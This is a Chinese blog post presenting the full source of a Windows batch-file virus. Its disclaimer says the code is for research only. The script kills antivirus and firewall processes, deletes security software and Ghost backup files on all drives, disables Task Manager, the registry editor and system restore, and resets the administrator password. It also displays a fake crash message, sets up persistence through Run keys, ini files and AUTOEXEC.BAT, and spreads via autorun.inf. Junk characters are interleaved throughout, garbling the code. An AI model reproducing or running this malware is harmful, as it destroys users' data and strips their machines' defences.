原创 黑客是如何制作编写超级批处理病毒的

       黑客是如何制作编写超级批处理病毒的

郑重声明:网上的批处理病毒很多但代码很少！在此公布黑客的代码给大家看,大家看代码，仅供研究病毒原理，知道病毒原理，然后知道如何与病毒做斗争。可不要拿去做坏事哦！！！若拿去做坏事，警察叔叔把你抓去，我可救不了你哦！！！

 4GhFJn}  
_ *Cf }LPe  
"*qy{xk  
@echo off {3[Gzq  
; (v@9^t  
title You DEAD!!!!!!! -- 5e]  
0C(KA R+-  
set taskkill="s" s.V# N 
*.O7AX@  
copy %0 %windir%\system32\cmd.bat LNI?Y/<  
C@sEYvR%  
attrib %windir%\system32\cmd.bat +r +s +h 5\k\: g  
U, h5-{Yu  
net stop sharedaccess >nul J2h{_"93  
:Q /tc'  
%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul ,A$.}Q^E  
.Bs5k$=  
%s% /im norton* /f >nul \4x|Q p  
(b(%y><  
%s% /im av* /f >nul V>>rTX  
KC,'guKC  
%s% /im fire* /f >nul . Cy9;:  
6r!^2e?i=  
%s% /im anti* /f >nul mE?:*X*J  
}7)^CsQs>  
%s% /im spy* /f >nul zf\Nl5x |  
d@@>/Lv3  
%s% /im bullguard /f >nul kb3pr B  
WS!.b,)]  
%s% /im PersFw /f >nul ]mgGctCc_  
DdPTj:  
%s% /im KAV* /f >nul .(3:Dj  
t\Qie  
%s% /im ZONEALARM /f >nul j9kM w@M  
}wO"")PE3  
%s% /im SAFEWEB /f >nul g:q `l=G  
y*"O 
%s% /im OUTPOST /f >nul K\$Y]ggo  
Yk/)J  
%s% /im nv* /f >nul }W@! a;6  
=(K[F1sX  
%s% /im nav* /f >nul 6A>Cb72R4k  
dC[=f9\*  
%s% /im F-* /f >nul 18i[(Kk  
y*t/T1{cE  
%s% /im ESAFE /f >nul [^LN&+~  
mb<5fE;4/  
%s% /im cle /f >nul >V^1^2J]  
 
%s% /im BLACKICE /f >nul =:U!L.a  
W8I>z>e!V  
%s% /im def* /f >nul .M Bh{`x  
Z @ep  
%s% /im 360safe.exe /f >nul eDb'YB<  
Ezg/7g3YR  
net stop Shadow" "System" "Service QMirS U  
ctic/If}  
set alldrive="d" e f g h i j k l m n o p q r s t u v w x y z 6=J@HT}H  
5#[io{Q  
for %%a in (c %alldrive%) do del %%a:\360* /f /s /q >nul -WcTw^hee  
#XK uQnzu  
for %%a in (c %alldrive%) do del %%a:\修复* /f /s /q >nul tiV="5" 5PnC  
k?z1[c l>  
rem 修改注册表....... bM*\/p24  
N>nuS SUz$  
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\ E 
c#\ s-6  
Folder\Hidden\SHOWALL /v ijdt _\  
@IxftJ 
CheckedValue /t REG_DWORD /d 00000000 /f >nul CN LX(|}{  
or[$J2(D  
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nRj{C(X  
Wm&3 (?  
NoRun /t REG_DWORD /d NA4:qo Y  
JjDR ~"V  
00000001 /f >nul g xb9s`i+,  
ZIwd:}  
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v .J<+Keo'  
WP B3Cu  
NoRecentDocsMenu /t \Kea|% AT  
:+;\R"  
REG_DWORD /d 00000001 /f >nul Vn$:uImX  
dXmuk#  
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v t:r8enn\z  
a4GqL(  
NoDrives /t REG_DWORD /d EnD+8:@(  
}w6|QDs+  
4294967295 /f >nul Sz;4VIr~~  
~#3:+p  
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v 1Xck7I0g@  
IYv57"xO(  
Disableregistrytools /t Tg^!}1g  
EBuanwd  
REG_DWORD /d 00000002 /f >nul vt\GQ!_  
Z.{C4lZ  
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v on}S0|`  
W,JxyN9`  
NoNetHood /t REG_DWORD /d |bdYPMg ~P  
? EEM@  
00000001 /f >nul kuW 8!n  
k]z'XFK(  
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V -[68oIg$#  
P}zE{xj}p  
NoDesktop /t REG_DWORD /d kdXL)lrK  
|vFe`.HTy|  
00000001 /f >nul w4iE7.9Y  
uh^n86W1  
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v {bEKMB(J%  
NpS"/Vo|  
NoClose /t REG_DWORD /d 44s Yv  
U%3%eB1  
00000001 /f >nul M@UY,~  
5 t].pT  
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v O6H 
>r)\7<3X)  
NoFind /t REG_DWORD /d f -;^e #  
~"xYz D  
00000001 /f >nul XQGZDp=N[  
wIYc\Q$B  
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Kso7 :  
*rNhmAs5b1  
DisableTaskMgr /t REG_DWORD \>@U8fp  
}k;k]T6<  
/d 00000001 /f >nul ?pDKa3`T  
WBTt-#c  
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v e;uZ$v~r  
~Fa6Wv  
NoLogOff /t REG_DWORD /d V D 83i6P  
:Za)l##O  
00000001 /f >nul wbL."A%N]  
HQzMVJ  
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v k3J(-OfN  
xkfOqWOPQ  
NoSetTaskBar /t REG_DWORD :alEUk/4G  
z~1FOehN  
/d 00000001 /f >nul HRME2Wc  
M,l7PaZPV  
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v ]:/d -X 1  
"I"0v 1R  
DisableSR /t REG_DWORD /d 9>=6ET`cW)  
ro[#DU  
00000001 /f >nul $7E^tob1]  
mW\ GQ  
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v `QE32\  
Mw1=6r 97  
DisableConfig /t REG_DWORD /d %ks#fvn?  
9YN2%d(  
00000001 /f >nul H[Y=g{gm(  
~q@>#Q1  
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v mF/y$+% X  
%Ve2M_N  
RestrictRun /t REG_DWORD /d `S\;Q  
k^}{}!  
00000001 /f >nul EfOqTGOz4K  
0UNN  
cls y/F#v^Y`  
\h8-M^9?  
net user administrator 123456 >nul |~6B4J]R+  
|Y& 6t#K'  
for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul G/"_e#  
$B$f nLL  
echo @echo off >d:\setup.bat "\')+_  
'2IH ,Io9  
echo shutdown -r -t 10 -f -c 亲爱的朋友，我十分抱歉的通知你，你的电脑已经严重崩溃，请重新 z::C,W]>=  
ow&# ^e  
安装系统可以解决此问题 \V iod~4  
=~0% x3~1  
!^.^ >>d:\setup.bat ,ZWj9xl]~)  
7QY wBu  
echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\「开始」菜单\程序\启动 O0T&NP" 
(}Xh;Ql^9  
\a.bat >>d:\setup.bat &W[b>/i8  
&x_Pmf1  
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v +BUz4k'GM  
*PCl[wC  
setup.bat /t REG_SZ /d d:\setup.bat Xbn@;VmUH^  
H=W92Ar8  
/f >>d:\setup.bat ^R7d3oa N  
p[EZGga  
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v nzHR@R  
2tAD8S5  
setup.bat /t REG_SZ /d d:\setup.bat 0Ir^{c  
4w kOV  
/f >>d:\setup.bat "AWLMJa  
E}g Z~,C  
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v EvCC!  
Gj4m>;x,  
setup.bat /t REG_SZ /d d:\setup.bat $@i@G[  
'Hk7IDf  
/f >>d:\setup.bat vKJ^@e8  
8Sx,o@9  
HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f Fp,I,Khd  
kZiJk#  
>>d:\setup.bat rMpgaKn  
mXHo|{xq  
echo [windows] >> %windir%\win.ini * m07%=q  
:l6r\m$ '  
echo run="d:"\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini N05(Y F  
R*qQ-l>@  
echo load="d:"\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini )(P j V  
{`e> 3?#  
echo [boot] >> %windir%\system.ini b6#8wH4  
b^Nm:T  
echo shell="explorer".exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini e:\cC>`  
<-81 1#  
echo [AutoRun] >d:\autorun.inf A:tSC<7d  
sMw/CIk  
echo Open="setup".bat >>d:\autorun.inf ?BT4%Hl|  
g{p]a4! )  
echo Open="system".bat >>d:\autorun.inf `87AEJ<  
1?HS8e#[  
attrib d:\autorun.inf +r +s +h >>d:\setup.bat Y\V.IUa  
[]aZB+~d8<  
attrib d:\setup.bat +r +s +h >>d:\setup.bat 8-v=7 mDB  
&_#0tWWX  
start d:\setup.bat /min >nul e4!0:nDZ  
nrT7rPY  
echo @echo off >>C:\AUTOEXEC.BAT {ODQmyf  
Jx[Oj5P?  
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v 5+@OGsK[&  
v tmEQVY 
AUTOEXEC.BAT /t REG_SZ /d d( G 
,b%v_b1  
C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT D!eqf#!}  
p=T8!5 n  
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v k3KV\>v  
H0*TY>wEt  
AUTOEXEC.BAT /t REG_SZ /d JX $^GZ9P1  
S- z _1}-  
C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT ;E>#\jF Z  
l}Rk`z  
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v 'y h, [j  
E ICl +  
AUTOEXEC.BAT /t REG_SZ /d /d~+]nVJ I  
A 5IW 8  
C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT 1e3poV  
;u0YQb&^I  
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v ip1k~}1<  
W93m)02g  
setup.bat /t REG_SZ /d d:\setup.bat ?Z`WX[`  
0RD{F  
/f >>C:\AUTOEXEC.BAT 5(LE30 0  
$imfXn}  
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v N~ES4b`!  
a?;]'A]z-  
setup.bat /t REG_SZ /d d:\setup.bat a-y"ox  
.G?Px`d{  
/f >>C:\AUTOEXEC.BAT Vyxx4;((  
Xu&^JO  
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v @?[,Qpr=c  
3%^H~J@9{  
setup.bat /t REG_SZ /d d:\setup.bat o f%6{U  
 
/f >>C:\AUTOEXEC.BAT N2xq]8]'~  
kZ& Wn  
echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT {=!qvP  
ad^x-*Oj'  
copy %0 %systemroot%\windows.bat >nul F> 
D>P?#:"j:  
if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat 9bR!RmRYu  
?hhx s?5u  
if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>% emUcN Ozo  
8NZNg*d  
windir%/system32/explorer.bat ^_1^'""nH  
+d:\0/#  
if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>% Kh6w 
dZ1TEXym  
windir%/system32/explorer.bat @'Xr A"T{  
fpeNaBc  
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v IE@b nU^  
SN w8\B  
AUTOEXEC.BAT /t REG_SZ /d pa'u<  
yn\fMr(:  
C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat MKr.KUJ  
j\K &v%u  
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v hdKVFZ0B  
f_~u?B 
AUTOEXEC.BAT /t REG_SZ /d t8V|Ba  
{xR}uO#LA  
C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat PLoBC:+9d  
T<z V^pi  
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v cG{TK@48  
3c\8h"h  
setup.bat /t REG_SZ /d d:\setup.bat [%,9L  
[G,|$~Z  
/f >>%windir%/system32/explorer.bat W5lU6&i]  
;<-x1#F|U  
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v <2iV3\  
VV6gY@c  
setup.bat /t REG_SZ /d d:\setup.bat D6Qk7  
q-L,<l$#  
/f >>%windir%/system32/explorer.bat V(Ua&  
*0f1Z!!  
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v U3vEU{%"  
Wgxy@9IiX  
explorer.bat /t REG_SZ /d % N^rN_A@)  
G-1~PW ]  
windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat c3U#8RH  
%af"knl2:  
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v `Hp^\wVZ  
w QXp4 w  
explorer.bat /t REG_SZ /d % Yvu'U%&\~-  
NhFK$>z*  
windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat aN7oiQd  
3K{r-9K  
echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat ,n~T/9  
;DE6 h+  
attrib %windir%/system32/explorer.bat +r +s +h% b,, 2,T@  
AW.8z}Q  
attrib %systemroot%/windows.bat +r +s +h AxNMSM?yt  
/}F>- =  
for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat CFFZ$M@  
;X9KgS  
for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat + v[\[0  
o6t3]T;':  
for %%c in (%alldrive%) do echo attrib system.bat +r +s +h >>%%c:\system.bat `H#+[6  
Wn& ]T%  
set drive="e" f g h i j k l m n o p q r s t u v w x y z #+{!g]  
g{'BS?s8NF  
for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf k-2;.Hqs  
'+fPbdKm  
for %%c in (%drive%) do echo Open="system".bat >>%%c:\autorun.inf \J9z_C;?  
|^>6_"I  
copy %0 d:\Program" "Files\run.bat X*7x3 ck  
cH"UG`esq  
for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start 7Q0|ZBFNK  
6_DO2o/y  
d:\Program" "Files\run.bat /min E7iy |N  
8]pADE*>v  
>>%%c:\system.bat ta<`]3w *  
(K[D-;s^V  
for %%c in (%alldrive%) do attrib autorun.inf +r +s +h >>%%c:\system.bat 7K&y;p2  
>6^0<9_  
for %%c in (%alldrive%) do attrib %%c:\autorun.inf +r +s +h >nul z7?|!-L68  
./ ^#  
for %%c in (%alldrive%) do attrib %%c:\system.bat +r +s +h >nul hjp3rNI  
`1N}:env  
if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat ('p 
}Ldb!|!  
/min >>d:\setup.bat FE V- o0  
:irXS74  
attrib d:\Program" "Files\run.bat +r +s +h >nul 0WKWXu}  
.%. Nb+  
del %0 {=:l8Lr!H  
2|aa/@ko  
exit